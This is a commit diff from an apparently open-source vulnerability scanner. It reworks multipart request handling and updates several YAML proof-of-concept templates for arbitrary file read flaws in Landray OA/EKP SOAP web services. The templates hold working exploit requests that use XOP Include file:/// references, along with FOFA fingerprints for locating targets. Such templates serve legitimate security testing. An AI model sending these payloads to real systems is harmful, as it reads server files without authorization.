update poc

zan8in · Dec 30, 2024 · 2a53206 · 2a53206
1 parent 6c1b3f3
commit 2a53206
Show file tree

Hide file tree

Showing 5 changed files with 37 additions and 30 deletions.
diff --git a/pkg/protocols/http/retryhttpclient/client.go b/pkg/protocols/http/retryhttpclient/client.go
@@ -103,12 +103,14 @@ func Request(target string, header []string, rule poc.Rule, variableMap map[stri
 	target = target + newpath
 
 	// body
-	if strings.HasPrefix(strings.ToLower(rule.Request.Headers["Content-Type"]), "multipart/form-Data") && strings.Contains(rule.Request.Body, "\n\n") {
-		multipartBody, err := dealMultipart(rule.Request.Headers["Content-Type"], rule.Request.Body)
-		if err != nil {
-			return err
+	if strings.HasPrefix(strings.ToLower(rule.Request.Headers["Content-Type"]), "multipart/") && !strings.Contains(rule.Request.Body, "\r\n") && (strings.Contains(rule.Request.Body, "\n") || strings.Contains(rule.Request.Body, "\n\n")) {
+		rule.Request.Body = setVariableMap(strings.TrimSpace(rule.Request.Body), variableMap)
+		splitstr := "\n"
+		if splitstr == "\n\n" {
+			splitstr = "\n\n"
 		}
-		rule.Request.Body = setVariableMap(strings.TrimSpace(multipartBody), variableMap)
+		rule.Request.Body = strings.ReplaceAll(rule.Request.Body, splitstr, "\r\n")
+		rule.Request.Body = strings.TrimRight(rule.Request.Body, "\r\n") + "\r\n"
 	} else {
 		rule.Request.Body = setVariableMap(strings.TrimSpace(rule.Request.Body), variableMap)
 	}
@@ -308,6 +310,7 @@ func setVariableMap(find string, variableMap map[string]any) string {
 	return find
 }
 
+// 处理multipart（已过期）
 func dealMultipart(contentType string, ruleBody string) (result string, err error) {
 	// 处理multipart的/n
 	re := regexp.MustCompile(`(?m)multipart\/form-Data; boundary=(.*)`)

diff --git a/...mMainDataInsystemWebservice-fileread.yaml → ...mMainDataInsystemWebservice-fileread.yaml b/...mMainDataInsystemWebservice-fileread.yaml → ...mMainDataInsystemWebservice-fileread.yaml
@@ -10,6 +10,8 @@ info:
     FOFA: body="Com_Parameter"
   reference:
     - https://github.com/wy876/POC/blob/main/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8CEKP%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3sysFormMainDataInsystemWebservice%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+  tags: landray,fileread
+  created: 2024/12/30
 
 set:
   rboundary: randomLowercase(8)

diff --git a/...oa-kmImeetingBookWebService-fileread.yaml → ...oa-kmImeetingBookWebService-fileread.yaml b/...oa-kmImeetingBookWebService-fileread.yaml → ...oa-kmImeetingBookWebService-fileread.yaml
@@ -10,6 +10,8 @@ info:
     FOFA: body="Com_Parameter"
   reference:
     - https://github.com/wy876/POC/blob/9f20511bb02d7babac30c47f48a72d427b7f5a3b/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8CEKP%E7%B3%BB%E7%BB%9F%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88.md
+  tags: landray,fileread
+  created: 2024/12/30
 
 set:
   rboundary: randomLowercase(8)

diff --git a/...-thirdImSyncForKKWebService-fileread.yaml → ...-thirdImSyncForKKWebService-fileread.yaml b/...-thirdImSyncForKKWebService-fileread.yaml → ...-thirdImSyncForKKWebService-fileread.yaml
@@ -10,24 +10,22 @@ info:
     FOFA: body="Com_Parameter"
   reference:
     - https://github.com/wy876/POC/blob/main/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8CEKP%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3sysFormMainDataInsystemWebservice%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+  tags: landray,fileread
+  created: 2024/12/30
 
 set:
   rboundary: randomLowercase(8)
-  hostname: request.url.host
-
 rules:
   r0:
     request:
-      raw: |-
-        POST /sys/webservice/thirdImSyncForKKWebService HTTP/1.1
-        SOAPAction
-        Content-Type: multipart/related; boundary=---------------------------{{rboundary}}
-        Accept-Encoding: gzip, deflate, br
-        Host: {{hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
-        Connection: keep-alive
-
-        -----------------------------{{rboundary}}
+      method: POST
+      path: /sys/webservice/thirdImSyncForKKWebService
+      headers:
+        Content-Type: multipart/related; boundary=----WebKitFormBoundary{{rboundary}}
+        SOAPAction: ""
+        Accept-Encoding: gzip, deflate
+      body: |
+        ------WebKitFormBoundary{{rboundary}}
         Content-Disposition: form-data; name="message"; filename="asdadads.aspx"
 
         <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.kk.im.third.kmss.landray.com/">
@@ -44,8 +42,6 @@ rules:
         </web:getTodo>
         </soapenv:Body>
         </soapenv:Envelope>
-        -----------------------------{{rboundary}}--
-    expression: |
-      response.status == 500 &&
-      response.body.ibcontains(b'Unmarshalling Error: Not a number')
+        ------WebKitFormBoundary{{rboundary}}--
+    expression: response.status == 500 && response.body.bcontains(b'Unmarshalling Error')
 expression: r0()
diff --git a/...ay-oa-loginWebserviceService-fileread.yml → ...y-oa-loginWebserviceService-fileread.yaml b/...ay-oa-loginWebserviceService-fileread.yml → ...y-oa-loginWebserviceService-fileread.yaml
@@ -3,38 +3,42 @@ info:
   name: Landray OA loginWebserviceService File Read
   author: ZacharyZcR
   severity: high
+  verified: true
   description: |
     Landray OA System loginWebserviceService interface has an arbitrary file read vulnerability.
     The vulnerability exists in the getLoginSessionId method which can be exploited to read arbitrary files on the system.
     FOFA: body="Com_Parameter"
   reference:
-    - https://github.com/wy876/POC/blob/main/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8CEKP%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3sysFormMainDataInsystemWebservice%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+    - https://github.com/wy876/POC/blob/9f20511bb02d7babac30c47f48a72d427b7f5a3b/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8CEKP%E7%B3%BB%E7%BB%9F%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88.md
+  tags: landray,fileread
+  created: 2024/12/30
 
+set:
+  rboundary: randomLowercase(8)
 rules:
   r0:
     request:
       method: POST
       path: /sys/webservice/loginWebserviceService
       headers:
-        Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
+        Content-Type: multipart/related; boundary=----WebKitFormBoundary{{rboundary}}
         SOAPAction: ""
         Accept-Encoding: gzip, deflate
       body: |
-        ------4upt9dwdca8rtwq9osuz
+        ------WebKitFormBoundary{{rboundary}}
         Content-Disposition: form-data; name="a"
+
         <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://sso.authentication.sys.kmss.landray.com/">
         <soapenv:Header/>
         <soapenv:Body>
             <web:getLoginSessionId>
                 <arg0>
                     <beginTimeStamp>a</beginTimeStamp>
-                    <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:/Windows/win.ini"/></count>
+                    <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"/></count>
                 </arg0>
             </web:getLoginSessionId>
         </soapenv:Body>
         </soapenv:Envelope>
-        ------4upt9dwdca8rtwq9osuz--
-
-    expression: response.status == 500 && response.body.bcontains(b'<soap:Envelope') && response.body.bcontains(b'<faultstring>') && response.body.bcontains(b'Unmarshalling Error')
-
-expression: r0()
+        ------WebKitFormBoundary{{rboundary}}--
+    expression: response.status == 500 && response.body.bcontains(b'Unmarshalling Error')
+expression: r0()